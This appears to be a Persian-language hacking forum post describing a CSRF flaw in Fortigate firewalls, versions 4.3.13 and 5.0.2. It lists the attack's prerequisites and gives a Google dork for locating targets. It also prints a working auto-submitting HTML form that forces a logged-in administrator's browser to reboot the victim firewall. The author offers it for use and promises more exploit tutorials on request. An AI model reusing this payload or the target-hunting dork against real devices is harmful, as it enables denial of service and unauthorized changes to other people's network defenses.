باز هم آموزش های اختصاصی من smiley این آسیب پذیری دو روز پیش توسط Sven Wurth رونمایی شده است ! توسط این اکسپلویت که از نوع CSRF می باشد ، هکر قادر به دور زدن فایروال در نسخه های 4.3.13 و 5.0.2 در تمامی فایروال های شرکت Fortigate می باشد . دلیل به وجود آمدن این باگ ، این است که بسیاری از فانکشن ها توسط CSRF-Tokens محافظت نشده و تحت شرایط خاصی امکان تغییر تنظیمات فایروال و یا معرفی شما به صورت مدیر وجود دارد

 

مواد مورد نیاز laugh :

- هکر باید IP دستگاه را بداند

- مدیر باید توسط یک authenticated connection (ارتباط تایید شده) به دستگاه متصل باشد

 

Dork گوگل :

english -help -printing  -companies -archive  -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser-

مثالی از این آسیب پدیری ;

 

با استفاده از کد های زیر شما می توانید فایروال های Fortigate را reboot کنید :

 


<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
                action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post">
                <input type="hidden" name="reason" value="">
                <input type="hidden" name="action" value="1">
                <input type="submit" name="add" value="rebootme">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
 

* توجه داشته باشید که این فقط یکی از انواع حملات از طریق این آسیب پذیری بود

 

در صورت درخواست کاربران آموزش استفاده از آسیب پذیری های مختلف را آماده و به اشتراک می گذارم تا همه دوستان قادر به استفاده از آسیب پذیری هایی که ارسال می کنم باشند .

 

موفق و پیروز باشید